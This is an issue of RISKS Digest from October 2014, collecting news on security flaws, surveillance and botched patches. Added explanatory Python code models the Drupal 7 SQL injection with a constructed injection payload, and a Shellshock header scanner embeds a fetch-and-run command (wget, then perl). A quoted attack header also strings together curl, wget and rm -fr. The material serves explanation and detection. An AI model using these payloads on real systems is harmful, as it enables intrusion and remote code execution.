RISKS Digest 28.32

Friday 31 October 2014

Rocket Heading to International Space Station Explodes; No One Is Hurt

NYT via Monty Solomon <>

Date: Tue, 28 Oct 2014 21:19:24 -0400

The unmanned cargo rocket exploded seconds after liftoff from a NASA site in eastern Virginia.

Dallas hospital alters account of failure to diagnose first US Ebola case

David Tarabar <>

Date: Sat, 25 Oct 2014 19:12:23 -0400

The first three articles in RISKS-28.30 describe a Dallas hospital blaming EHR software for not diagnosing the first US case of Ebola. However, on a Friday evening, the hospital told another story. (Bad news released on Friday evening is a popular PR tactic.)

But on Friday evening, the hospital effectively retracted that portion of its statement, saying that `there was no flaw' in its electronic health records system. The hospital said ``the patient's travel history was documented and available to the full care team in the electronic health record (E.H.R.), including within the physician's workflow.''

An ER patient history is not meaningless paperwork. It may be diagnostically significant and an ER doc is responsible for examining it. All patients are asked about any foreign travel. While EHR software can be improved, human and/or institutional error should be assigned the major blame for this failure to diagnose Ebola.

Cars become uninsurable due to their weak security

Jeremy Epstein <>

Date: Tue, 28 Oct 2014 10:53:19 -0400

According to a BBC report, insurance companies are refusing to insure certain models of cars, or are requiring additional safeguards. The reason? The electronic keys can be hacked, and the number of thefts has been increasing dramatically.

This is probably the most direct consumer connection between (computer) security and insurance that I've seen. Could you imagine "your homeowners insurance bill is going up because you run Windows"?

HP accidentally signed malware, will revoke certificate

Ars <>

Date: Fri, 10 Oct 2014 09:39:26 -0700

Ars Technica via NNSquad

Regardless of the cause, the revocation of the affected certificate will require HP to re-issue a large number of software packages with a new digital signature. While the certificate drop may not affect systems with the software already installed, users will be alerted to a bad certificate if they attempt to re-install software from original media. The full impact of the certificate revocation won't be known until after Verisign revokes the certificate on October 21, Wahlin said.


Clueless FBI sabotages its own anti-encryption campaign

Caroline Craig <>

Date: Fri, 24 Oct 2014 21:49:14 -0700

Caroline Craig, InfoWorld | Oct 24, 2014

FBI Director Comey says smartphone encryption puts law enforcement in peril. Too bad he doesn't seem to understand technology

FBI director says Chinese hackers are like a "drunk burglar"

Ars <>

Date: Tue, 7 Oct 2014 10:31:54 -0400

Report Reveals Wider Tracking of Mail in U.S.

NYT via Monty Solomon <>

Date: Tue, 28 Oct 2014 06:19:25 -0400

The Postal Service approved nearly 50,000 requests last year from law enforcement agencies to secretly track the mail of ordinary Americans for use in criminal and national security investigations.

ComputerCOP: dubious "Internet Safety Software" given to US families

Ars via NNSquad <>

Date: Wed, 1 Oct 2014 08:32:48 -0700

Ars via NNSquad

Police chiefs, sheriffs, and district attorneys have handed out hundreds of thousands of copies of the disc to parents for free at schools, libraries, and community events, usually as a part of an "Internet Safety" outreach initiative. (You can see the long list of ComputerCOP outlets here.) The packaging typically features the agency's official seal and the chief's portrait, with a signed message warning of the "dark and dangerous off-ramps" of the Internet.

As official as it looks, ComputerCOP is actually just spyware, generally bought in bulk from a New York company that appears to do nothing but market this software to local government agencies using shady information.

The way ComputerCOP works is neither safe nor secure. It isn't particularly effective either, except for generating positive PR for the law enforcement agencies distributing it.

As security software goes, we observed a product with a keystroke-capturing function, also called a "keylogger," that could place a family's personal information at extreme risk by transmitting those keystroke logs over the Internet to third-party servers without encryption. That means many versions of ComputerCOP leave children (and their parents, guests, friends, and anyone using the affected computer) exposed to the same predators, identity thieves, and bullies that police claim the software protects against.

Furthermore, by providing a free keylogging program--software that operates without even the most basic security safeguards--law enforcement agencies are passing around what amounts to a spying tool that could easily be abused by people who want to snoop on spouses, roommates, or co-workers.

Adobe is Spying on Users, Collecting Data on Their eBook Libraries; Adobe Responds to Reports of Their Spying, Offers Half Truths and Misleading Statements

Nate Hoffelder via Gene Wirchenko <>

Date: Thu, 09 Oct 2014 21:08:48 -0700

Nate Hoffelder, 6 Oct 2014

Nate Hoffelder, 7 Oct 2014

Adobe tracks your e-book reading habits -- sends logs in plain text

Ars <>

Date: Tue, 7 Oct 2014 09:22:03 -0700

Ars Technica via NNSquad

"Adobe's Digital Editions e-book and PDF reader—an application used by thousands of libraries to give patrons access to electronic lending libraries--actively logs and reports every document readers add to their local "library" along with what users do with those files. Even worse, the logs are transmitted over the Internet in the clear, allowing anyone who can monitor network traffic (such as the National Security Agency, Internet service providers and cable companies, or others sharing a public Wi-Fi network) to follow along over readers' shoulders. Ars has independently verified the logging of e-reader activity with the use of a packet capture tool. The exposure of data was first discovered by Nate Hoffelder of The Digital Reader, who reported the issue to Adobe but received no reply. Ars has also reached out to Adobe for comment with no response."

Bugzilla 0-day can reveal 0-day bugs in OSS giants such as Mozilla and Red Hat

Ars <>

Date: Tue, 7 Oct 2014 10:29:27 -0400

White hat claims Yahoo and WinZip hacked by "shellshock" exploiters

Ars <>

Date: Tue, 7 Oct 2014 10:26:11 -0400

Severe Security Problem in Drupal 7.x

Bob Gezelter <>

Date: Fri, 31 Oct 2014 12:33:38 -0700

There has been a critical security flaw identified in Drupal 7.x; an update is available. The flaw allows a SQL injection attack to compromise servers running Drupal. Details of the attack have been published. The relevant bug entry appears to be:

Bob Gezelter,
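As an added illustration, not from Bob's note and not Drupal's own code: the published fix (Drupal 7.32) changed DatabaseConnection::expandArguments(), the routine that turns an array-valued placeholder such as :name into :name_0, :name_1, ... for an IN (...) clause. Before the fix the suffix came from the PHP array's own keys, which a client controls through form input of the form name[...]; the fix applies array_values() first, so only positional indices ever reach the SQL text. The Python model below reproduces both behaviours against a constructed SQLite table; the table, the query and the HOSTILE payload are constructed for the example and are not the published attack verbatim.

```python
import re
import sqlite3

# Constructed sample data; not Drupal's users table.
USERS = [(1, "alice", 1), (2, "bob", 1), (3, "carol", 0)]


def open_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid INTEGER, name TEXT, status INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return db


def expand_arguments(query, args, use_array_values):
    """Model of Drupal 7's DatabaseConnection::expandArguments().

    An array-valued placeholder :name is rewritten as :name_0, :name_1, ...
    so the caller can write WHERE name IN (:name).  Before 7.32 the suffix
    came from the array's own keys; the 7.32 fix applies array_values()
    first, so only positional indices are spliced into the query text.
    """
    args = dict(args)
    for key, data in list(args.items()):
        if not isinstance(data, dict):
            continue
        items = enumerate(data.values()) if use_array_values else data.items()
        new_keys = {f"{key}_{i}": value for i, value in items}
        placeholders = ", ".join(":" + k for k in new_keys)
        # The generated placeholder text goes straight into the SQL string.
        query = re.sub(":" + re.escape(key) + r"\b", lambda _m: placeholders, query)
        del args[key]
        args.update(new_keys)
    return query, args


def active_users_named(names, use_array_values):
    """Return (sql, sorted matching names) for a constructed lookup query."""
    template = "SELECT name FROM users WHERE name IN (:name) AND status = 1"
    sql, params = expand_arguments(template, {"name": names}, use_array_values)
    rows = open_db().execute(sql, params).fetchall()
    return sql, sorted(row[0] for row in rows)


# Constructed payload in the shape of the published attack: the SQL rides in
# an array *key*, and a plain "0" key supplies a value for the :name_0 that
# the injected text leaves behind.
HOSTILE = {"0) OR 1=1 -- ": "alice", "0": "alice"}

if __name__ == "__main__":
    for fixed in (False, True):
        sql, found = active_users_named(HOSTILE, fixed)
        print("array_values fix:" if fixed else "vulnerable:", sql, found, sep="\n  ")
```

With the vulnerable expansion the query becomes `... IN (:name_0) OR 1=1 -- , :name_0) AND status = 1` and the status check is commented away, so the blocked account comes back too; with array_values() the same input yields `IN (:name_0, :name_1)` and nothing hostile reaches the SQL. Applying the update closes the hole but does not undo an injection that already ran; Drupal's follow-up advisory told owners of sites not patched within hours of the announcement to treat them as compromised, so check for unexpected users, modules and files as well as the version number.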

Chip&Pin^H^H^HDip: Replay It Again Sam

Henry Baker <>

Date: Tue, 28 Oct 2014 13:58:13 -0700

FYI—Didn't Ross Anderson's group at Cambridge demonstrate similar problems with chips&pins a while ago? [YES: See]

Krebs on Security, 27 Oct 2014

Replay Attacks Spoof Chip Card Charges

An odd new pattern of credit card fraud emanating from Brazil and targeting U.S. financial institutions could spell costly trouble for banks that are just beginning to issue customers more secure chip-based credit and debit cards.

Over the past week, at least three U.S. financial institutions reported receiving tens of thousands of dollars in fraudulent credit and debit card transactions coming from Brazil and hitting card accounts stolen in recent retail heists, principally cards compromised as part of the breach at Home Depot.

The most puzzling aspect of these unauthorized charges? They were all submitted through Visa and MasterCard's networks as chip-enabled transactions, even though the banks that issued the cards in question haven't even yet begun sending customers chip-enabled cards.

The most frustrating aspect of these unauthorized charges? They're far harder for the bank to dispute. Banks usually end up eating the cost of fraud from unauthorized transactions when scammers counterfeit and use stolen credit cards. Even so, a bank may be able to recover some of that loss through dispute mechanisms set up by Visa and MasterCard, as long as the bank can show that the fraud was the result of a breach at a specific merchant (in this case Home Depot).

However, banks are responsible for all of the fraud costs that occur from any fraudulent use of their customers' chip-enabled credit/debit cards -- even fraudulent charges disguised as these pseudo-chip transactions. [...]
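The excerpt does not say what the issuing bank can check, so here is an added sketch that is not from Krebs's article: an EMV online authorization carries an Application Request Cryptogram (ARQC), a MAC the card computes under a card-unique key over the transaction data, including the Application Transaction Counter (ATC) the card increments on every transaction. An issuer that verifies the cryptogram and requires the ATC to move forward rejects a replayed message even though its MAC is genuine, and an issuer that has never issued a chip card for a PAN has no key to verify against and can decline the "chip" flag outright. The Python below models those three checks; it uses an HMAC in place of EMV's 3DES session-key MAC, and the PANs, key and transaction values are constructed.

```python
import hashlib
import hmac


def arqc(card_key, pan, atc, amount_cents, unpredictable_number):
    """Toy cryptogram: MAC over the transaction data under a card-unique key.

    EMV derives a session key from the card key and the ATC and uses a
    3DES-based MAC; the HMAC here only stands in for that computation.
    """
    data = f"{pan}|{atc}|{amount_cents}|{unpredictable_number}".encode()
    return hmac.new(card_key, data, hashlib.sha256).digest()[:8]


class Issuer:
    """Issuer-side checks on a transaction the network flags as chip-originated."""

    def __init__(self, chip_keys):
        self.chip_keys = dict(chip_keys)  # PAN -> card key; absent: no chip card issued
        self.last_atc = {}                # PAN -> highest ATC seen so far

    def authorize(self, pan, atc, amount_cents, unpredictable_number, cryptogram):
        key = self.chip_keys.get(pan)
        if key is None:
            return "DECLINE: no chip card issued for this PAN"
        expected = arqc(key, pan, atc, amount_cents, unpredictable_number)
        if not hmac.compare_digest(expected, cryptogram):
            return "DECLINE: cryptogram does not verify"
        if atc <= self.last_atc.get(pan, -1):
            return "DECLINE: ATC did not advance (replay)"
        self.last_atc[pan] = atc
        return "APPROVE"


def run_scenarios():
    """Constructed traffic: one real chip card, one account with no chip card."""
    chip_pan, chip_key = "4000000000000002", b"constructed-card-key"
    stripe_pan = "4000000000000010"
    issuer = Issuer({chip_pan: chip_key})
    results = {}

    # Genuine transaction: the card computes the cryptogram over fresh data.
    tx = (chip_pan, 17, 4999, "1a2b3c4d")
    good = arqc(chip_key, *tx)
    results["genuine"] = issuer.authorize(*tx, good)
    # The same message submitted again: valid MAC, stale counter.
    results["replayed"] = issuer.authorize(*tx, good)
    # Counter moved on, but the MAC was made up.
    results["forged"] = issuer.authorize(chip_pan, 18, 4999, "1a2b3c4d", b"\0" * 8)
    # A "chip" transaction against a PAN that never had a chip.
    results["no_chip_card"] = issuer.authorize(stripe_pan, 1, 4999, "1a2b3c4d", b"\0" * 8)
    return results


if __name__ == "__main__":
    for name, outcome in run_scenarios().items():
        print(f"{name:>12}: {outcome}")
```

The last scenario is the one the excerpt describes: cards that have never been chip-enabled arriving as chip transactions. An issuer that trusts the network's chip flag without owning a cryptogram check inherits the liability the excerpt mentions; one that keeps the per-PAN key table and the last-seen ATC declines all three bad cases.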

Apple will face $350M trial over iPod DRM

Ars <>

Date: Fri, 3 Oct 2014 16:44:29 -0400

Apple updates definitions to prevent "iWorm" botnet malware on Macs

Ars <>

Date: Tue, 7 Oct 2014 10:30:53 -0400

APPLE-SA-2014-09-29-1 OS X bash Update 1.0

Monty Solomon <>

Date: Fri, 3 Oct 2014 14:30:31 -0400

OS X bash Update 1.0 is now available and addresses the following:

Bash
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5
Impact: In certain configurations, a remote attacker may be able to execute arbitrary shell commands
Description: An issue existed in Bash's parsing of environment variables. This issue was addressed through improved environment variable parsing by better detecting the end of the function statement. This update also incorporated the suggested CVE-2014-7169 change, which resets the parser state. In addition, this update added a new namespace for exported functions by creating a function decorator to prevent unintended header passthrough to Bash. The names of all environment variables that introduce function definitions are required to have a prefix "__BASH_FUNC<" and suffix ">()" to prevent unintended function passing via HTTP headers.

CVE-2014-6271 : Stephane Chazelas
CVE-2014-7169 : Tavis Ormandy

OS X bash Update 1.0 may be obtained from the following webpages:
- OS X Lion
- OS X Mountain Lion
- OS X Mavericks

To check that bash has been updated:

* Open Terminal
* Execute this command: bash --version
* The version after applying this update will be:
  OS X Mavericks: GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin13)
  OS X Mountain Lion: GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin12)
  OS X Lion: GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin11)

Information will also be posted to the Apple Security Updates web site:

This message is signed with Apple's Product Security PGP key, and details are available at:

APPLE-SA-2014-09-23-1 OS X: Flash Player plug-in blocked

Monty Solomon <>

Date: Fri, 3 Oct 2014 14:29:09 -0400

Due to security issues in older versions, Apple has updated the web plug-in blocking mechanism to disable all versions prior to Flash Player and

Information on blocked web plug-ins will be posted to:

This message is signed with Apple's Product Security PGP key, and details are available at:

"One week after patch, Flash vulnerability already exploited in large-scale attacks"

Lucian Constantin <>

Date: Tue, 21 Oct 2014 17:51:20 -0700

Lucian Constantin, InfoWorld, 21 Oct 2014
The Fiesta exploit kit bundles an exploit for the CVE-2014-0569 vulnerability in Flash Player, researchers found

2 Drug Chains Disable Apple Pay, as a Rival Makes Plans

NYT <>

Date: Sun, 26 Oct 2014 23:32:57 -0400

A consortium of merchants plans to introduce a payment system next year that will supplant the use of credit and debit cards.

Apple Pay Runs Afoul of MCX, a Group With a Rival Product

Monty Solomon <>

Date: Wed, 29 Oct 2014 07:08:12 -0400

Rite Aid and CVS are not accepting Apple Pay because they belong to a consortium of retailers planning to release their own mobile payment system next year.

Hackers swipe e-mail addresses from Apple Pay-competitor CurrentC

Ars <>

Date: Wed, 29 Oct 2014 22:46:18 -0400

How Apple Pay and Google Wallet actually work

Ars Technica <>

Date: Wed, 29 Oct 2014 22:47:29 -0400

Reddit-powered botnet infected thousands of Macs worldwide

Sean Gallagher <>

Date: Sun, 5 Oct 2014 00:08:37 -0400

Sean Gallagher, Ars Technica, 3 Oct 2014
Mac.BackDoor.iWorm used Minecraft server subreddit for command and control.

The Russian antivirus vendor Dr. Web has reported the spread of a new botnet that exclusively targets Apple computers running Mac OS X. According to a survey of traffic conducted by researchers at Dr. Web, over 17,000 Macs worldwide are part of the Mac.BackDoor.iWorm botnet--and almost a quarter of them are in the US. One of the most curious aspects of the botnet is that it uses a search of Reddit posts to a Minecraft server list subreddit to retrieve IP addresses for its command and control (CnC) network. That subreddit now appears to have been expunged of CnC data, and the account that posted the data appears to be shut down. ...

Apple patches "Shellshock" Bash bug in OS X 10.9, 10.8, and 10.7

Andrew Cunningham <>

Date: Fri, 3 Oct 2014 00:23:44 -0400

Andrew Cunningham, Ars Technica, 29 Sep 2014
Fixes Bash bug discovered last week that's already been seen in the wild. [See also—PGN]

Shellshock fixes beget another round of patches as attacks mount

Andrew Cunningham <>

Date: Fri, 3 Oct 2014 00:22:24 -0400

Sean Gallagher, Ars Technica, 30 Sep 2014
SANS' Internet Storm Center moves up threat level based on bash exploits in wild.

Over the past few days, Apple, Red Hat, and others have pushed out patches to vulnerabilities in the GNU Bourne Again Shell (bash). The vulnerabilities previously allowed attackers to execute commands remotely on systems that use the command parser under some conditions--including Web servers that use certain configurations of Apache. However, some of the patches made changes that broke from the functionality of the GNU bash code, so now debate continues about how to "un-fork" the patches and better secure bash.

At the same time, the urgency of applying those patches has mounted as more attacks that exploit the weaknesses in bash's security (dubbed "Shellshock") have appeared. In addition to the threat first spotted the day after the vulnerability was made public, a number of new attacks have emerged. While some appear to simply be vulnerability scans, there are also new exploit attempts that carry malware or attempt to give the attacker direct remote control of the targeted system. ...

Executing the Messenger

Henry Baker <>

Date: Tue, 28 Oct 2014 14:16:05 -0700

[attachment (Henry says, ``but sometimes a picture is worth 1000 words.'') deleted for RISKS. Sorry. PGN]

Here's the To: line: To: {:;, }, /bin/sh.-c.'/bin/sh.-c.'cd/tmp, curl.-sO., lwp-download.http:;, //, wget., fetch., perl.ex.txt, <rm.-fr.ex.*'.&'.&@mailserver.internaldomain>

Cc, From, Subject, References, Message-ID, Comments, Keywords, Resent-From are all similar.

Nothing quite like bashing the postman with shellshock...

Michael Mimoso, 27 Oct 2014
Shellshock Exploits Targeting SMTP Servers at Webhosts

The persistence of the Shellshock vulnerability remains high more than a month after it first surfaced. The latest attacks involved SMTP servers belonging to web hosts, said a report published by the SANS Internet Storm Center.

Attackers are using Shellshock exploits targeting the now infamous vulnerability in Bash (Bourne Again Shell) in order to drop a perl script onto compromised computers. The script adds the hacked computers to a botnet that receives its commands over IRC, said a post on the Binary Defense Systems website: ``The attack leverages Shellshock as a main attack vector through the subject, body, to, from fields. Once compromised, a perl botnet is activated and beaconing on IRC for further instructions.''
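Reading the Apple description earlier in this issue together with the SMTP report above, as an added example that is not from either source: an unpatched bash imported a function from any environment variable whose value began with "() {" and, because of CVE-2014-6271, went on to run whatever followed the closing brace; the Apple update only imports from variables whose names carry the __BASH_FUNC<...>() wrapper, so a header that lands in a variable such as HTTP_USER_AGENT, or a mail field exported the same way, no longer qualifies. The Python below maps header fields to environment-variable names with the CGI convention (HTTP_ plus the upper-cased name, RFC 3875; how a particular mail pipeline exports header fields varies, so that mapping is an assumption here), lists which variables each bash version would have parsed as functions, and pulls out the trailing command. The header sample and the 198.51.100.7 address are constructed.

```python
import re

# Wrapper the Apple update requires around the *name* of an environment
# variable before bash will treat its value as an exported function.
FUNC_PREFIX, FUNC_SUFFIX = "__BASH_FUNC<", ">()"
# Unpatched bash imported any variable whose *value* started with "() {".
FUNC_VALUE = re.compile(r"^\(\) \{")
# Text after the function body's closing brace and ";": what CVE-2014-6271
# executed at import time.
TRAILING = re.compile(r"^\(\) \{.*?\}\s*;\s*(.*)$", re.S)


def header_to_env_name(header):
    """CGI mapping (RFC 3875): 'User-Agent' -> 'HTTP_USER_AGENT'.

    Assumed here for mail header fields as well; real MTA and filter
    pipelines differ in how (and whether) they export headers.
    """
    return "HTTP_" + re.sub(r"[^A-Z0-9]", "_", header.upper())


def imported_functions(env, patched):
    """Names of variables this bash version would parse as function definitions."""
    names = []
    for name, value in env.items():
        if not FUNC_VALUE.match(value):
            continue
        if patched and not (name.startswith(FUNC_PREFIX) and name.endswith(FUNC_SUFFIX)):
            continue
        names.append(name)
    return names


def trailing_command(value):
    m = TRAILING.match(value)
    return m.group(1).strip() if m else ""


def scan_headers(headers, patched=False):
    """[(env var, command that would run)] for each header bash would import."""
    env = {header_to_env_name(h): v for h, v in headers}
    return [(n, trailing_command(env[n])) for n in imported_functions(env, patched)]


# Constructed sample in the shape of the SMTP attack described above
# (198.51.100.7 is a documentation address, not a real host).
PAYLOAD = "() { :;}; /bin/sh -c 'cd /tmp; wget http://198.51.100.7/ex.txt; perl ex.txt'"
SAMPLE_HEADERS = [
    ("From", PAYLOAD),
    ("To", PAYLOAD),
    ("Subject", "Invoice 4711"),
    ("User-Agent", "Mozilla/5.0"),
]

if __name__ == "__main__":
    for name, cmd in scan_headers(SAMPLE_HEADERS):
        print(f"unpatched bash runs from {name}: {cmd}")
    print("patched bash imports:", scan_headers(SAMPLE_HEADERS, patched=True))
```

The same scan applied to captured mail or HTTP headers is a cheap detection rule for the attempts SANS reported: anything whose value starts with "() {" is an exploit attempt whether or not the receiving host was vulnerable. Note that the wrapper only protects bash's own import path; a process that copies header text into a shell command line is a separate injection problem the update does not address.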

Even a built-in keylogger! -- "Microsoft's Windows 10 has permission to spy on you!"

Techworm <>

Date: Tue, 7 Oct 2014 08:21:54 -0700

Techworm via NNSquad

"Microsoft collects information about you, your devices, applications and networks, and your use of those devices, applications and networks. Examples of data we collect include your name, email address, preferences and interests; browsing, search and file history; phone call and SMS data; device configuration and sensor data; and application usage."

"If you open a file, we may collect information about the file, the application used to open the file, and how long it takes any use [of] it for purposes such as improving performance, or [if you] enter text, we may collect typed characters and use them for purposes such as improving autocomplete and spell check features."

Worth reading, even though the entire article is in a low-contrast font and italics.

[See also Chris Merriman, *The Inquirer*, 3 Oct 2014
Its 'privacy' policy includes permission to use a keylogger]

More on Windows 10 /preview/ data collection

Lauren Weinstein <>

Date: Tue, 7 Oct 2014 09:03:11 -0700

I want to add a few of my own thoughts to that article on the Windows 10 preview version data collection policies.

If any of those data collection features were enabled by default, and unless there's a big red warning at installation that you must respond to with more than a single click, explaining all these aspects, it's still unacceptable. Too many people will download this and use it like any other system without considering the implications. I couldn't care less what they plan to do when it goes out of beta at this juncture—I'm concerned about right now.

As I recall they've done similar in previous previews, but the stakes are much higher now given government attitudes to collected data.

It is a mistake to assume that everyone who will download this preview or end up with it installed (perhaps by their "IT Guy") will be cognizant of the options and implications. I'm the guy who found MS' undisclosed "phone home" behavior years ago. It was not an enormous privacy problem, but it was still telling and a lot of bad press for MS resulted.

"Four more botched Microsoft patches"

Woody Leonhard <>

Date: Fri, 17 Oct 2014 14:29:16 -0700

Woody Leonhard, InfoWorld, 16 Oct 2014
Windows users are reporting significant problems with four more October Black Tuesday patches: KB 3000061, KB 2984972, KB 2949927, KB 2995388

"Microsoft yanks botched patch KB 2949927, re-issues KB 2952664"

Woody Leonhard <>

Date: Mon, 20 Oct 2014 11:32:26 -0700

Ah, the risks of missing documentation.

Woody Leonhard, InfoWorld | 17 Oct 2014
Windows 7 upgrade compatibility patch gets a tweaked installer, while the SHA-2 hashing patch is summarily removed without explanation

"Microsoft warns users to kill botched KB 2949927 patch"

Woody Leonhard <>

Date: Mon, 20 Oct 2014 11:45:17 -0700

Woody Leonhard, InfoWorld | 20 Oct 2014
Microsoft yanked SHA-2 patch KB 2949927, and now goes further and cautions users to uninstall the update

"Microsoft misses Windows bug, hackers slip past patch"

Gregg Keizer <>

Date: Thu, 23 Oct 2014 14:09:10 -0700

Gregg Keizer, Computerworld, 22 Oct 2014
Last week's security update 'not robust enough,' say researchers who co-reported flaw

Windows Update intentionally destroys chips

Brian Benchoff via Henry Baker <>

Date: Fri, 24 Oct 2014 09:35:35 -0700

Microsoft Windows Update distributed new driver code that intentionally destroys "counterfeit" chips; the USB "PID" is set to 0 in the EEPROM of the device, rendering the device useless forever more.

This ploy opens up a whole new front in the hacker wars; NSA TAO is no doubt rubbing its hands with delight as we speak.

Just as STUXNET broke down one barrier in hacking; FTDI broke down another. E.g., in the future, look for iPhone and Android apps which disable their competitor apps & implanted medical devices that destroy other implanted medical devices found in the same human body. [...]

Brian Benchoff, FTDI Screws Up, Backs Down, 24 Oct 2014

Re: Windows 9 Reportedly Skipped as Name Would Have Created Code Bugs

Mark Thorson <>

Date: Mon, 27 Oct 2014 21:09:17 -0700

I confidently predict the next version will be Windows 20, which raises the obvious question of what follows Windows 80? I suggest Windows A. That buys another 26 major revisions, which should take us comfortably past the year 199Z (2025 AD).

Taylor Swift Tops Canadian iTunes Chart With 8 Seconds of White Noise

Lorena O'Neil via Henry Baker <>

Date: Fri, 03 Oct 2014 11:06:10 -0700

Andy Patrizio, ITworld, 3 Oct 2014
It's not just your boss or the government that's spying on you, it's also the devices and technologies you embrace.